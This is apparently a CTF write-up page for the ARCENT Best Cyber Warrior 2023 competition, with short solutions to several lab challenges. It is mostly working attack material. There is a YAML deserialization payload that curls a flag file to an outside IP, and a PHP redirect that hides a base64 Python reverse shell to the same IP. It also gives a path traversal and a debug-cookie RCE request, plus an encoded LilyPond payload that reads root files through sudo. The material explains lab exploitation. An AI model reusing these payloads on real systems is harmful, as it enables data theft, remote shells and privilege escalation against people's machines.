🪖ARCENT Best Cyber Warrior 2023

Quick challenge writeups for the CTF to explain exploitation.

CyberCompose

Vulnerable to https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/ Rapid7

Payload:

!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']

Confuser

Vulnerable to https://github.com/advisories/GHSA-ffqj-6fqr-9h24

Intruder

Got SSRF using https://blog.doyensec.com/2023/03/16/ssrf-remediation-bypass.html
It was a hassle setting up my own https server for it and couldn't use self signed certs because it did not have insecure option enabled on the vulnerable webserver.
Was able to get YAML deserialization with this php redirect to get the SSRF and exploit working:

<?php  header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>

S7R34M5

from scapy.all import *
import sys

#take in file name from argument
file = sys.argv[1]

#open file
f = open(file, "r")

# Define the source and destination IP addresses
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"

# Define an array to store the data bytes
data_array = []

packets = rdpcap(file)

def process_packet(packet):
    # find all UDP packets from 192.168.245.129 to 192.168.1.7 and get the data byte and add to array and print array
    if packet.haslayer(IP) and packet.haslayer(UDP) and packet[IP].src == source_ip and packet[IP].dst == destination_ip:
        data = packet[Raw].load
        data_array.append(data)

# Process each packet in the pcap file
for packet in packets:
    process_packet(packet)

# merge the array and print
data = b''.join(data_array)
print(str(data, 'utf-8'))

LeakyPond

Initial Access

Path traversal: /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php

Debug was still enabled and would execute system on the debug cookie value.

RCE:

GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blue

Used Ivan Sincek PHP reverse shell for more stable environment.

Priv Esc

$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add

\version "2.23.82"

for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$

SayingPlease

Simply change the base64 encoded authentication token from user to admin and the index.php page will display the flag.

PreviousCTF Writ3ups NextBounty Hunter Writeup

Last updated 1 year ago